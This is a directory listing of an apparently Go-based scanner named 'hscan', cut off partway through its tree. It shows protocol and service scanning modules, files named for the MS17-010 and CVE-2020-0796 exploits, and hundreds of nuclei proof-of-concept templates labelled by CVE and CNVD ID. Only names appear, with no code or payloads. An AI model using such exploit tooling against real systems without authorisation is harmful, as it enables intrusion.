├── .gitignore ├── .idea ├── .gitignore ├── .name ├── hscan.iml └── modules.xml ├── Makefile ├── README.md ├── common ├── config.go └── utils.go ├── config.yaml ├── discover ├── discover.go ├── output │ └── output.go ├── parse │ ├── parse_byte_to_string.go │ ├── parse_network.go │ ├── parse_ping.go │ ├── parse_scheme.go │ ├── parse_uri.go │ └── parse_verbose.go ├── protocol │ ├── discover.go │ ├── get │ │ ├── tcp.go │ │ ├── tls.go │ │ └── udp.go │ ├── identify.go │ └── judge │ │ ├── tcp_activemq.go │ │ ├── tcp_dcerpc.go │ │ ├── tcp_frp.go │ │ ├── tcp_ftp.go │ │ ├── tcp_http.go │ │ ├── tcp_imap.go │ │ ├── tcp_ldap.go │ │ ├── tcp_mssql.go │ │ ├── tcp_mysql.go │ │ ├── tcp_oracle.go │ │ ├── tcp_pop3.go │ │ ├── tcp_rdp.go │ │ ├── tcp_redis.go │ │ ├── tcp_rmi.go │ │ ├── tcp_rtsp.go │ │ ├── tcp_smb.go │ │ ├── tcp_smtp.go │ │ ├── tcp_snmp.go │ │ ├── tcp_socks.go │ │ ├── tcp_ssh.go │ │ ├── tcp_telnet.go │ │ ├── tcp_vnc.go │ │ ├── tls_https.go │ │ ├── tls_rdp.go │ │ ├── tls_redis_ssl.go │ │ └── udp_nbns.go ├── proxy │ ├── proxy_http.go │ ├── proxy_tcp.go │ ├── proxy_tls.go │ └── proxy_udp.go └── rule │ └── rule.go ├── docs └── pages1.png ├── go.mod ├── go.sum ├── hscan_template.toml ├── main.go ├── nonweb ├── service.go ├── services │ ├── CVE-2020-0796.go │ ├── fcgiscan.go │ ├── findnet.go │ ├── ftp.go │ ├── memcached.go │ ├── mongodb.go │ ├── ms17010.go │ ├── ms17010_exp.go │ ├── mssql.go │ ├── mysql.go │ ├── netbios.go │ ├── oracle.go │ ├── postgres.go │ ├── rdp.go │ ├── redis.go │ ├── smb.go │ └── ssh.go └── utils │ └── info_struct.go ├── parse ├── flag.go ├── parse.go ├── parse_credit.go ├── parse_ip.go ├── parse_port.go ├── parse_proxy.go ├── parse_reverse.go └── parse_url.go ├── probe └── probe.go ├── utils ├── log.go ├── logger │ ├── level.go │ └── log.go ├── proxy.go └── utils.go └── web ├── errors ├── errors.go └── stack.go ├── internal └── common │ ├── check │ ├── check.go │ ├── nuclei.go │ └── xray.go │ ├── errors │ └── errors.go │ ├── load │ └── load.go │ ├── output │ └── outut.go │ └── tag │ └── tag.go ├── load.go ├── pkg ├── common │ └── structs │ │ ├── output.go │ │ ├── result.go │ │ └── reverse.go ├── nuclei │ ├── parse │ │ └── parse.go │ └── structs │ │ ├── faketype.go │ │ ├── poc.go │ │ └── task.go └── xray │ ├── cel │ ├── cel.go │ ├── definition.go │ └── implementation.go │ ├── parse │ └── parse.go │ ├── requests │ ├── cache.go │ └── requests.go │ └── structs │ ├── cache.go │ ├── poc.go │ ├── requests.pb.go │ ├── requests.pb.go.bak │ ├── requests.proto │ └── tasks.go ├── pocs ├── nuclei │ ├── cnvd │ │ ├── 2018 │ │ │ └── CNVD-2018-13393.yaml │ │ ├── 2019 │ │ │ ├── CNVD-2019-01348.yaml │ │ │ ├── CNVD-2019-06255.yaml │ │ │ ├── CNVD-2019-19299.yaml │ │ │ └── CNVD-2019-32204.yaml │ │ ├── 2020 │ │ │ ├── CNVD-2020-23735.yaml │ │ │ ├── CNVD-2020-46552.yaml │ │ │ ├── CNVD-2020-56167.yaml │ │ │ ├── CNVD-2020-62422.yaml │ │ │ ├── CNVD-2020-67113.yaml │ │ │ └── CNVD-2020-68596.yaml │ │ ├── 2021 │ │ │ ├── CNVD-2021-01931.yaml │ │ │ ├── CNVD-2021-09650.yaml │ │ │ ├── CNVD-2021-10543.yaml │ │ │ ├── CNVD-2021-14536.yaml │ │ │ ├── CNVD-2021-15822.yaml │ │ │ ├── CNVD-2021-15824.yaml │ │ │ ├── CNVD-2021-17369.yaml │ │ │ ├── CNVD-2021-26422.yaml │ │ │ ├── CNVD-2021-28277.yaml │ │ │ ├── CNVD-2021-30167.yaml │ │ │ └── CNVD-2021-49104.yaml │ │ └── 2022 │ │ │ └── CNVD-2022-03672.yaml │ ├── cves │ │ ├── 2000 │ │ │ └── CVE-2000-0114.yaml │ │ ├── 2001 │ │ │ └── CVE-2001-1473.yaml │ │ ├── 2002 │ │ │ └── CVE-2002-1131.yaml │ │ ├── 2004 │ │ │ └── CVE-2004-0519.yaml │ │ ├── 2005 │ │ │ ├── CVE-2005-2428.yaml │ │ │ ├── CVE-2005-3344.yaml │ │ │ └── CVE-2005-4385.yaml │ │ ├── 2006 │ │ │ ├── CVE-2006-1681.yaml │ │ │ └── CVE-2006-2842.yaml │ │ ├── 2007 │ │ │ ├── CVE-2007-0885.yaml │ │ │ ├── CVE-2007-4504.yaml │ │ │ ├── CVE-2007-4556.yaml │ │ │ └── CVE-2007-5728.yaml │ │ ├── 2008 │ │ │ ├── CVE-2008-2398.yaml │ │ │ ├── CVE-2008-2650.yaml │ │ │ ├── CVE-2008-4668.yaml │ │ │ ├── CVE-2008-4764.yaml │ │ │ ├── CVE-2008-5587.yaml │ │ │ ├── CVE-2008-6080.yaml │ │ │ ├── CVE-2008-6172.yaml │ │ │ ├── CVE-2008-6222.yaml │ │ │ └── CVE-2008-6668.yaml │ │ ├── 2009 │ │ │ ├── CVE-2009-0545.yaml │ │ │ ├── CVE-2009-0932.yaml │ │ │ ├── CVE-2009-1151.yaml │ │ │ ├── CVE-2009-1496.yaml │ │ │ ├── CVE-2009-1558.yaml │ │ │ ├── CVE-2009-1872.yaml │ │ │ ├── CVE-2009-2015.yaml │ │ │ ├── CVE-2009-2100.yaml │ │ │ ├── CVE-2009-3053.yaml │ │ │ ├── CVE-2009-3318.yaml │ │ │ ├── CVE-2009-4202.yaml │ │ │ ├── CVE-2009-4223.yaml │ │ │ ├── CVE-2009-4679.yaml │ │ │ ├── CVE-2009-5020.yaml │ │ │ └── CVE-2009-5114.yaml │ │ ├── 2010 │ │ │ ├── CVE-2010-0157.yaml │ │ │ ├── CVE-2010-0219.yaml │ │ │ ├── CVE-2010-0467.yaml │ │ │ ├── CVE-2010-0696.yaml │ │ │ ├── CVE-2010-0759.yaml │ │ │ ├── CVE-2010-0942.yaml │ │ │ ├── CVE-2010-0943.yaml │ │ │ ├── CVE-2010-0944.yaml │ │ │ ├── CVE-2010-0972.yaml │ │ │ ├── CVE-2010-0982.yaml │ │ │ ├── CVE-2010-0985.yaml │ │ │ ├── CVE-2010-1056.yaml │ │ │ ├── CVE-2010-1081.yaml │ │ │ ├── CVE-2010-1217.yaml │ │ │ ├── CVE-2010-1219.yaml │ │ │ ├── CVE-2010-1302.yaml │ │ │ ├── CVE-2010-1304.yaml │ │ │ ├── CVE-2010-1305.yaml │ │ │ ├── CVE-2010-1306.yaml │ │ │ ├── CVE-2010-1307.yaml │ │ │ ├── CVE-2010-1308.yaml │ │ │ ├── CVE-2010-1312.yaml │ │ │ ├── CVE-2010-1313.yaml │ │ │ ├── CVE-2010-1314.yaml │ │ │ ├── CVE-2010-1315.yaml │ │ │ ├── CVE-2010-1340.yaml │ │ │ ├── CVE-2010-1345.yaml │ │ │ ├── CVE-2010-1352.yaml │ │ │ ├── CVE-2010-1353.yaml │ │ │ ├── CVE-2010-1354.yaml │ │ │ ├── CVE-2010-1461.yaml │ │ │ ├── CVE-2010-1469.yaml │ │ │ ├── CVE-2010-1470.yaml │ │ │ ├── CVE-2010-1471.yaml │ │ │ ├── CVE-2010-1472.yaml │ │ │ ├── CVE-2010-1473.yaml │ │ │ ├── CVE-2010-1474.yaml │ │ │ ├── CVE-2010-1475.yaml │ │ │ ├── CVE-2010-1476.yaml │ │ │ ├── CVE-2010-1478.yaml │ │ │ ├── CVE-2010-1491.yaml │ │ │ ├── CVE-2010-1494.yaml │ │ │ ├── CVE-2010-1495.yaml │ │ │ ├── CVE-2010-1531.yaml │ │ │ ├── CVE-2010-1532.yaml │ │ │ ├── CVE-2010-1533.yaml │ │ │ ├── CVE-2010-1534.yaml │ │ │ ├── CVE-2010-1535.yaml │ │ │ ├── CVE-2010-1540.yaml │ │ │ ├── CVE-2010-1601.yaml │ │ │ ├── CVE-2010-1602.yaml │ │ │ ├── CVE-2010-1603.yaml │ │ │ ├── CVE-2010-1607.yaml │ │ │ ├── CVE-2010-1653.yaml │ │ │ ├── CVE-2010-1657.yaml │ │ │ ├── CVE-2010-1658.yaml │ │ │ ├── CVE-2010-1659.yaml │ │ │ ├── CVE-2010-1714.yaml │ │ │ ├── CVE-2010-1715.yaml │ │ │ ├── CVE-2010-1717.yaml │ │ │ ├── CVE-2010-1718.yaml │ │ │ ├── CVE-2010-1719.yaml │ │ │ ├── CVE-2010-1722.yaml │ │ │ ├── CVE-2010-1723.yaml │ │ │ ├── CVE-2010-1858.yaml │ │ │ ├── CVE-2010-1870.yaml │ │ │ ├── CVE-2010-1875.yaml │ │ │ ├── CVE-2010-1878.yaml │ │ │ ├── CVE-2010-1952.yaml │ │ │ ├── CVE-2010-1953.yaml │ │ │ ├── CVE-2010-1954.yaml │ │ │ ├── CVE-2010-1955.yaml │ │ │ ├── CVE-2010-1956.yaml │ │ │ ├── CVE-2010-1957.yaml │ │ │ ├── CVE-2010-1977.yaml │ │ │ ├── CVE-2010-1979.yaml │ │ │ ├── CVE-2010-1980.yaml │ │ │ ├── CVE-2010-1981.yaml │ │ │ ├── CVE-2010-1982.yaml │ │ │ ├── CVE-2010-1983.yaml │ │ │ ├── CVE-2010-2033.yaml │ │ │ ├── CVE-2010-2034.yaml │ │ │ ├── CVE-2010-2035.yaml │ │ │ ├── CVE-2010-2036.yaml │ │ │ ├── CVE-2010-2037.yaml │ │ │ ├── CVE-2010-2045.yaml │ │ │ ├── CVE-2010-2050.yaml │ │ │ ├── CVE-2010-2122.yaml │ │ │ ├── CVE-2010-2128.yaml │ │ │ ├── CVE-2010-2259.yaml │ │ │ ├── CVE-2010-2307.yaml │ │ │ ├── CVE-2010-2507.yaml │ │ │ ├── CVE-2010-2680.yaml │ │ │ ├── CVE-2010-2682.yaml │ │ │ ├── CVE-2010-2857.yaml │ │ │ ├── CVE-2010-2861.yaml │ │ │ ├── CVE-2010-2918.yaml │ │ │ ├── CVE-2010-2920.yaml │ │ │ ├── CVE-2010-3203.yaml │ │ │ ├── CVE-2010-3426.yaml │ │ │ ├── CVE-2010-4231.yaml │ │ │ ├── CVE-2010-4239.yaml │ │ │ ├── CVE-2010-4282.yaml │ │ │ ├── CVE-2010-4617.yaml │ │ │ ├── CVE-2010-4719.yaml │ │ │ ├── CVE-2010-4769.yaml │ │ │ ├── CVE-2010-4977.yaml │ │ │ ├── CVE-2010-5028.yaml │ │ │ ├── CVE-2010-5278.yaml │ │ │ └── CVE-2010-5286.yaml │ │ ├── 2011 │ │ │ ├── CVE-2011-0049.yaml │ │ │ ├── CVE-2011-1669.yaml │ │ │ ├── CVE-2011-2744.yaml │ │ │ ├── CVE-2011-2780.yaml │ │ │ ├── CVE-2011-3315.yaml │ │ │ ├── CVE-2011-4336.yaml │ │ │ ├── CVE-2011-4618.yaml │ │ │ ├── CVE-2011-4624.yaml │ │ │ ├── CVE-2011-4804.yaml │ │ │ ├── CVE-2011-4926.yaml │ │ │ ├── CVE-2011-5106.yaml │ │ │ ├── CVE-2011-5107.yaml │ │ │ ├── CVE-2011-5179.yaml │ │ │ ├── CVE-2011-5181.yaml │ │ │ └── CVE-2011-5265.yaml │ │ ├── 2012 │ │ │ ├── CVE-2012-0392.yaml │ │ │ ├── CVE-2012-0896.yaml │ │ │ ├── CVE-2012-0901.yaml │ │ │ ├── CVE-2012-0981.yaml │ │ │ ├── CVE-2012-0991.yaml │ │ │ ├── CVE-2012-0996.yaml │ │ │ ├── CVE-2012-1226.yaml │ │ │ ├── CVE-2012-1823.yaml │ │ │ ├── CVE-2012-1835.yaml │ │ │ ├── CVE-2012-2371.yaml │ │ │ ├── CVE-2012-3153.yaml │ │ │ ├── CVE-2012-4242.yaml │ │ │ ├── CVE-2012-4253.yaml │ │ │ ├── CVE-2012-4273.yaml │ │ │ ├── CVE-2012-4547.yaml │ │ │ ├── CVE-2012-4768.yaml │ │ │ ├── CVE-2012-4878.yaml │ │ │ ├── CVE-2012-4889.yaml │ │ │ ├── CVE-2012-4940.yaml │ │ │ └── CVE-2012-5913.yaml │ │ ├── 2013 │ │ │ ├── CVE-2013-1965.yaml │ │ │ ├── CVE-2013-2248.yaml │ │ │ ├── CVE-2013-2251.yaml │ │ │ ├── CVE-2013-2287.yaml │ │ │ ├── CVE-2013-3526.yaml │ │ │ ├── CVE-2013-3827.yaml │ │ │ ├── CVE-2013-4117.yaml │ │ │ ├── CVE-2013-4625.yaml │ │ │ ├── CVE-2013-5528.yaml │ │ │ ├── CVE-2013-5979.yaml │ │ │ ├── CVE-2013-7091.yaml │ │ │ └── CVE-2013-7240.yaml │ │ ├── 2014 │ │ │ ├── CVE-2014-10037.yaml │ │ │ ├── CVE-2014-2321.yaml │ │ │ ├── CVE-2014-2323.yaml │ │ │ ├── CVE-2014-2383.yaml │ │ │ ├── CVE-2014-2908.yaml │ │ │ ├── CVE-2014-2962.yaml │ │ │ ├── CVE-2014-3120.yaml │ │ │ ├── CVE-2014-3206.yaml │ │ │ ├── CVE-2014-3704.yaml │ │ │ ├── CVE-2014-3744.yaml │ │ │ ├── CVE-2014-4210.yaml │ │ │ ├── CVE-2014-4513.yaml │ │ │ ├── CVE-2014-4535.yaml │ │ │ ├── CVE-2014-4536.yaml │ │ │ ├── CVE-2014-4539.yaml │ │ │ ├── CVE-2014-4544.yaml │ │ │ ├── CVE-2014-4550.yaml │ │ │ ├── CVE-2014-4558.yaml │ │ │ ├── CVE-2014-4561.yaml │ │ │ ├── CVE-2014-4592.yaml │ │ │ ├── CVE-2014-4940.yaml │ │ │ ├── CVE-2014-5111.yaml │ │ │ ├── CVE-2014-5258.yaml │ │ │ ├── CVE-2014-5368.yaml │ │ │ ├── CVE-2014-6271.yaml │ │ │ ├── CVE-2014-6308.yaml │ │ │ ├── CVE-2014-8682.yaml │ │ │ ├── CVE-2014-8799.yaml │ │ │ ├── CVE-2014-9094.yaml │ │ │ ├── CVE-2014-9444.yaml │ │ │ ├── CVE-2014-9606.yaml │ │ │ ├── CVE-2014-9607.yaml │ │ │ ├── CVE-2014-9608.yaml │ │ │ ├── CVE-2014-9609.yaml │ │ │ ├── CVE-2014-9614.yaml │ │ │ ├── CVE-2014-9615.yaml │ │ │ ├── CVE-2014-9617.yaml │ │ │ └── CVE-2014-9618.yaml │ │ ├── 2015 │ │ │ ├── CVE-2015-0554.yaml │ │ │ ├── CVE-2015-1000012.yaml │ │ │ ├── CVE-2015-1427.yaml │ │ │ ├── CVE-2015-1503.yaml │ │ │ ├── CVE-2015-1880.yaml │ │ │ ├── CVE-2015-2067.yaml │ │ │ ├── CVE-2015-2068.yaml │ │ │ ├── CVE-2015-2080.yaml │ │ │ ├── CVE-2015-2166.yaml │ │ │ ├── CVE-2015-2807.yaml │ │ │ ├── CVE-2015-3224.yaml │ │ │ ├── CVE-2015-3306.yaml │ │ │ ├── CVE-2015-3337.yaml │ │ │ ├── CVE-2015-3648.yaml │ │ │ ├── CVE-2015-3897.yaml │ │ │ ├── CVE-2015-4050.yaml │ │ │ ├── CVE-2015-4414.yaml │ │ │ ├── CVE-2015-4632.yaml │ │ │ ├── CVE-2015-4694.yaml │ │ │ ├── CVE-2015-5461.yaml │ │ │ ├── CVE-2015-5471.yaml │ │ │ ├── CVE-2015-5531.yaml │ │ │ ├── CVE-2015-5688.yaml │ │ │ ├── CVE-2015-6477.yaml │ │ │ ├── CVE-2015-6544.yaml │ │ │ ├── CVE-2015-6920.yaml │ │ │ ├── CVE-2015-7297.yaml │ │ │ ├── CVE-2015-7377.yaml │ │ │ ├── CVE-2015-7450.yaml │ │ │ ├── CVE-2015-7780.yaml │ │ │ ├── CVE-2015-7823.yaml │ │ │ ├── CVE-2015-8349.yaml │ │ │ ├── CVE-2015-8399.yaml │ │ │ ├── CVE-2015-8813.yaml │ │ │ ├── CVE-2015-9414.yaml │ │ │ └── CVE-2015-9480.yaml │ │ ├── 2016 │ │ │ ├── CVE-2016-0957.yaml │ │ │ ├── CVE-2016-1000126.yaml │ │ │ ├── CVE-2016-1000127.yaml │ │ │ ├── CVE-2016-1000128.yaml │ │ │ ├── CVE-2016-1000129.yaml │ │ │ ├── CVE-2016-1000130.yaml │ │ │ ├── CVE-2016-1000131.yaml │ │ │ ├── CVE-2016-1000132.yaml │ │ │ ├── CVE-2016-1000133.yaml │ │ │ ├── CVE-2016-1000134.yaml │ │ │ ├── CVE-2016-1000135.yaml │ │ │ ├── CVE-2016-1000136.yaml │ │ │ ├── CVE-2016-1000137.yaml │ │ │ ├── CVE-2016-1000138.yaml │ │ │ ├── CVE-2016-1000139.yaml │ │ │ ├── CVE-2016-1000140.yaml │ │ │ ├── CVE-2016-1000141.yaml │ │ │ ├── CVE-2016-1000142.yaml │ │ │ ├── CVE-2016-1000143.yaml │ │ │ ├── CVE-2016-1000146.yaml │ │ │ ├── CVE-2016-1000148.yaml │ │ │ ├── CVE-2016-1000149.yaml │ │ │ ├── CVE-2016-1000152.yaml │ │ │ ├── CVE-2016-1000153.yaml │ │ │ ├── CVE-2016-1000154.yaml │ │ │ ├── CVE-2016-1000155.yaml │ │ │ ├── CVE-2016-10033.yaml │ │ │ ├── CVE-2016-10134.yaml │ │ │ ├── CVE-2016-10924.yaml │ │ │ ├── CVE-2016-10940.yaml │ │ │ ├── CVE-2016-10956.yaml │ │ │ ├── CVE-2016-10960.yaml │ │ │ ├── CVE-2016-10993.yaml │ │ │ ├── CVE-2016-1555.yaml │ │ │ ├── CVE-2016-2004.yaml │ │ │ ├── CVE-2016-2389.yaml │ │ │ ├── CVE-2016-3081.yaml │ │ │ ├── CVE-2016-3088.yaml │ │ │ ├── CVE-2016-3978.yaml │ │ │ ├── CVE-2016-4975.yaml │ │ │ ├── CVE-2016-4977.yaml │ │ │ ├── CVE-2016-5649.yaml │ │ │ ├── CVE-2016-6210.yaml │ │ │ ├── CVE-2016-6277.yaml │ │ │ ├── CVE-2016-7552.yaml │ │ │ ├── CVE-2016-7981.yaml │ │ │ └── CVE-2016-8527.yaml │ │ ├── 2017 │ │ │ ├── CVE-2017-0929.yaml │ │ │ ├── CVE-2017-1000028.yaml │ │ │ ├── CVE-2017-1000029.yaml │ │ │ ├── CVE-2017-1000170.yaml │ │ │ ├── CVE-2017-1000486.yaml │ │ │ ├── CVE-2017-10075.yaml │ │ │ ├── CVE-2017-10271.yaml │ │ │ ├── CVE-2017-10974.yaml │ │ │ ├── CVE-2017-11444.yaml │ │ │ ├── CVE-2017-11512.yaml │ │ │ ├── CVE-2017-11610.yaml │ │ │ ├── CVE-2017-12149.yaml │ │ │ ├── CVE-2017-12542.yaml │ │ │ ├── CVE-2017-12544.yaml │ │ │ ├── CVE-2017-12583.yaml │ │ │ ├── CVE-2017-12611.yaml │ │ │ ├── CVE-2017-12615.yaml │ │ │ ├── CVE-2017-12629.yaml │ │ │ ├── CVE-2017-12635.yaml │ │ │ ├── CVE-2017-12637.yaml │ │ │ ├── CVE-2017-12794.yaml │ │ │ ├── CVE-2017-14135.yaml │ │ │ ├── CVE-2017-14535.yaml │ │ │ ├── CVE-2017-14537.yaml │ │ │ ├── CVE-2017-14651.yaml │ │ │ ├── CVE-2017-14849.yaml │ │ │ ├── CVE-2017-15287.yaml │ │ │ ├── CVE-2017-15363.yaml │ │ │ ├── CVE-2017-15647.yaml │ │ │ ├── CVE-2017-15715.yaml │ │ │ ├── CVE-2017-15944.yaml │ │ │ ├── CVE-2017-16806.yaml │ │ │ ├── CVE-2017-16877.yaml │ │ │ ├── CVE-2017-17043.yaml │ │ │ ├── CVE-2017-17059.yaml │ │ │ ├── CVE-2017-17451.yaml │ │ │ ├── CVE-2017-17562.yaml │ │ │ ├── CVE-2017-18024.yaml │ │ │ ├── CVE-2017-18536.yaml │ │ │ ├── CVE-2017-18598.yaml │ │ │ ├── CVE-2017-18638.yaml │ │ │ ├── CVE-2017-3506.yaml │ │ │ ├── CVE-2017-3528.yaml │ │ │ ├── CVE-2017-3881.yaml │ │ │ ├── CVE-2017-4011.yaml │ │ │ ├── CVE-2017-5487.yaml │ │ │ ├── CVE-2017-5521.yaml │ │ │ ├── CVE-2017-5631.yaml │ │ │ ├── CVE-2017-5638.yaml │ │ │ ├── CVE-2017-5982.yaml │ │ │ ├── CVE-2017-6090.yaml │ │ │ ├── CVE-2017-7269.yaml │ │ │ ├── CVE-2017-7391.yaml │ │ │ ├── CVE-2017-7615.yaml │ │ │ ├── CVE-2017-7921.yaml │ │ │ ├── CVE-2017-8917.yaml │ │ │ ├── CVE-2017-9140.yaml │ │ │ ├── CVE-2017-9288.yaml │ │ │ ├── CVE-2017-9506.yaml │ │ │ ├── CVE-2017-9791.yaml │ │ │ ├── CVE-2017-9805.yaml │ │ │ ├── CVE-2017-9822.yaml │ │ │ ├── CVE-2017-9833.yaml │ │ │ └── CVE-2017-9841.yaml │ │ ├── 2018 │ │ │ ├── CVE-2018-0127.yaml │ │ │ ├── CVE-2018-0296.yaml │ │ │ ├── CVE-2018-1000129.yaml │ │ │ ├── CVE-2018-1000130.yaml │ │ │ ├── CVE-2018-1000226.yaml │ │ │ ├── CVE-2018-1000533.yaml │ │ │ ├── CVE-2018-1000600.yaml │ │ │ ├── CVE-2018-1000861.yaml │ │ │ ├── CVE-2018-10093.yaml │ │ │ ├── CVE-2018-10095.yaml │ │ │ ├── CVE-2018-10141.yaml │ │ │ ├── CVE-2018-10201.yaml │ │ │ ├── CVE-2018-10562.yaml │ │ │ ├── CVE-2018-10818.yaml │ │ │ ├── CVE-2018-10822.yaml │ │ │ ├── CVE-2018-10823.yaml │ │ │ ├── CVE-2018-10956.yaml │ │ │ ├── CVE-2018-11231.yaml │ │ │ ├── CVE-2018-11409.yaml │ │ │ ├── CVE-2018-11709.yaml │ │ │ ├── CVE-2018-11759.yaml │ │ │ ├── CVE-2018-11776.yaml │ │ │ ├── CVE-2018-11784.yaml │ │ │ ├── CVE-2018-12031.yaml │ │ │ ├── CVE-2018-12054.yaml │ │ │ ├── CVE-2018-1207.yaml │ │ │ ├── CVE-2018-12095.yaml │ │ │ ├── CVE-2018-12296.yaml │ │ │ ├── CVE-2018-12300.yaml │ │ │ ├── CVE-2018-12613.yaml │ │ │ ├── CVE-2018-12634.yaml │ │ │ ├── CVE-2018-1271.yaml │ │ │ ├── CVE-2018-1273.yaml │ │ │ ├── CVE-2018-12998.yaml │ │ │ ├── CVE-2018-1335.yaml │ │ │ ├── CVE-2018-13379.yaml │ │ │ ├── CVE-2018-13380.yaml │ │ │ ├── CVE-2018-13980.yaml │ │ │ ├── CVE-2018-14013.yaml │ │ │ ├── CVE-2018-14064.yaml │ │ │ ├── CVE-2018-14574.yaml │ │ │ ├── CVE-2018-14728.yaml │ │ │ ├── CVE-2018-14912.yaml │ │ │ ├── CVE-2018-14916.yaml │ │ │ ├── CVE-2018-14931.yaml │ │ │ ├── CVE-2018-15138.yaml │ │ │ ├── CVE-2018-15473.yaml.bak │ │ │ ├── CVE-2018-15517.yaml │ │ │ ├── CVE-2018-15535.yaml │ │ │ ├── CVE-2018-15745.yaml │ │ │ ├── CVE-2018-15961.yaml │ │ │ ├── CVE-2018-16059.yaml │ │ │ ├── CVE-2018-16133.yaml │ │ │ ├── CVE-2018-16167.yaml │ │ │ ├── CVE-2018-16283.yaml │ │ │ ├── CVE-2018-16288.yaml │ │ │ ├── CVE-2018-16299.yaml │ │ │ ├── CVE-2018-16341.yaml │ │ │ ├── CVE-2018-16668.yaml │ │ │ ├── CVE-2018-16670.yaml │ │ │ ├── CVE-2018-16671.yaml │ │ │ ├── CVE-2018-16716.yaml │ │ │ ├── CVE-2018-16763.yaml │ │ │ ├── CVE-2018-16836.yaml │ │ │ ├── CVE-2018-17246.yaml │ │ │ ├── CVE-2018-17254.yaml │ │ │ ├── CVE-2018-17422.yaml │ │ │ ├── CVE-2018-17431.yaml │ │ │ ├── CVE-2018-18069.yaml │ │ │ ├── CVE-2018-18264.yaml │ │ │ ├── CVE-2018-18323.yaml │ │ │ ├── CVE-2018-18570.yaml │ │ │ ├── CVE-2018-18775.yaml │ │ │ ├── CVE-2018-18777.yaml │ │ │ ├── CVE-2018-18778.yaml │ │ │ ├── CVE-2018-18925.yaml │ │ │ ├── CVE-2018-19326.yaml │ │ │ ├── CVE-2018-19365.yaml │ │ │ ├── CVE-2018-19386.yaml │ │ │ ├── CVE-2018-19439.yaml │ │ │ ├── CVE-2018-19458.yaml │ │ │ ├── CVE-2018-19753.yaml │ │ │ ├── CVE-2018-20462.yaml │ │ │ ├── CVE-2018-20470.yaml │ │ │ ├── CVE-2018-20824.yaml │ │ │ ├── CVE-2018-20985.yaml │ │ │ ├── CVE-2018-2392.yaml │ │ │ ├── CVE-2018-2628.yaml │ │ │ ├── CVE-2018-2791.yaml │ │ │ ├── CVE-2018-2893.yaml │ │ │ ├── CVE-2018-2894.yaml │ │ │ ├── CVE-2018-3167.yaml │ │ │ ├── CVE-2018-3238.yaml │ │ │ ├── CVE-2018-3714.yaml │ │ │ ├── CVE-2018-3760.yaml │ │ │ ├── CVE-2018-3810.yaml │ │ │ ├── CVE-2018-5230.yaml │ │ │ ├── CVE-2018-5233.yaml │ │ │ ├── CVE-2018-5316.yaml │ │ │ ├── CVE-2018-5715.yaml │ │ │ ├── CVE-2018-6008.yaml │ │ │ ├── CVE-2018-6910.yaml │ │ │ ├── CVE-2018-7251.yaml │ │ │ ├── CVE-2018-7422.yaml │ │ │ ├── CVE-2018-7467.yaml │ │ │ ├── CVE-2018-7490.yaml │ │ │ ├── CVE-2018-7600.yaml │ │ │ ├── CVE-2018-7602.yaml │ │ │ ├── CVE-2018-7662.yaml │ │ │ ├── CVE-2018-7700.yaml │ │ │ ├── CVE-2018-7719.yaml │ │ │ ├── CVE-2018-8006.yaml │ │ │ ├── CVE-2018-8033.yaml │ │ │ ├── CVE-2018-8715.yaml │ │ │ ├── CVE-2018-8719.yaml │ │ │ ├── CVE-2018-8727.yaml │ │ │ ├── CVE-2018-8770.yaml │ │ │ ├── CVE-2018-9118.yaml │ │ │ ├── CVE-2018-9161.yaml │ │ │ ├── CVE-2018-9205.yaml │ │ │ ├── CVE-2018-9845.yaml │ │ │ └── CVE-2018-9995.yaml │ │ ├── 2019 │ │ │ ├── CVE-2019-0193.yaml │ │ │ ├── CVE-2019-0221.yaml │ │ │ ├── CVE-2019-0230.yaml │ │ │ ├── CVE-2019-10068.yaml │ │ │ ├── CVE-2019-10092.yaml │ │ │ ├── CVE-2019-1010287.yaml │ │ │ ├── CVE-2019-1010290.yaml │ │ │ ├── CVE-2019-10232.yaml │ │ │ ├── CVE-2019-10405.yaml │ │ │ ├── CVE-2019-10475.yaml │ │ │ ├── CVE-2019-10758.yaml │ │ │ ├── CVE-2019-11013.yaml │ │ │ ├── CVE-2019-11248.yaml │ │ │ ├── CVE-2019-11510.yaml │ │ │ ├── CVE-2019-11580.yaml │ │ │ ├── CVE-2019-11581.yaml │ │ │ ├── CVE-2019-11869.yaml │ │ │ ├── CVE-2019-12276.yaml │ │ │ ├── CVE-2019-12314.yaml │ │ │ ├── CVE-2019-12461.yaml │ │ │ ├── CVE-2019-12593.yaml │ │ │ ├── CVE-2019-12616.yaml │ │ │ ├── CVE-2019-12725.yaml │ │ │ ├── CVE-2019-12962.yaml │ │ │ ├── CVE-2019-13101.yaml │ │ │ ├── CVE-2019-13392.yaml │ │ │ ├── CVE-2019-13396.yaml │ │ │ ├── CVE-2019-13462.yaml │ │ │ ├── CVE-2019-14205.yaml │ │ │ ├── CVE-2019-14223.yaml │ │ │ ├── CVE-2019-14312.yaml │ │ │ ├── CVE-2019-14322.yaml │ │ │ ├── CVE-2019-14470.yaml │ │ │ ├── CVE-2019-14696.yaml │ │ │ ├── CVE-2019-14974.yaml │ │ │ ├── CVE-2019-15107.yaml │ │ │ ├── CVE-2019-15501.yaml │ │ │ ├── CVE-2019-15713.yaml │ │ │ ├── CVE-2019-15858.yaml │ │ │ ├── CVE-2019-15859.yaml │ │ │ ├── CVE-2019-15889.yaml │ │ │ ├── CVE-2019-16097.yaml │ │ │ ├── CVE-2019-16123.yaml │ │ │ ├── CVE-2019-16278.yaml │ │ │ ├── CVE-2019-16313.yaml │ │ │ ├── CVE-2019-16332.yaml │ │ │ ├── CVE-2019-16525.yaml │ │ │ ├── CVE-2019-1653.yaml │ │ │ ├── CVE-2019-16662.yaml │ │ │ ├── CVE-2019-16759.yaml │ │ │ ├── CVE-2019-16920.yaml │ │ │ ├── CVE-2019-16996.yaml │ │ │ ├── CVE-2019-16997.yaml │ │ │ ├── CVE-2019-17270.yaml │ │ │ ├── CVE-2019-17418.yaml │ │ │ ├── CVE-2019-17444.yaml │ │ │ ├── CVE-2019-17503.yaml │ │ │ ├── CVE-2019-17506.yaml │ │ │ ├── CVE-2019-17538.yaml │ │ │ ├── CVE-2019-17558.yaml │ │ │ ├── CVE-2019-1821.yaml │ │ │ ├── CVE-2019-18393.yaml │ │ │ ├── CVE-2019-18394.yaml │ │ │ ├── CVE-2019-18818.yaml │ │ │ ├── CVE-2019-18922.yaml │ │ │ ├── CVE-2019-19134.yaml │ │ │ ├── CVE-2019-19368.yaml │ │ │ ├── CVE-2019-19781.yaml │ │ │ ├── CVE-2019-19824.yaml │ │ │ ├── CVE-2019-19908.yaml │ │ │ ├── CVE-2019-19985.yaml │ │ │ ├── CVE-2019-20085.yaml │ │ │ ├── CVE-2019-20141.yaml │ │ │ ├── CVE-2019-20183.yaml │ │ │ ├── 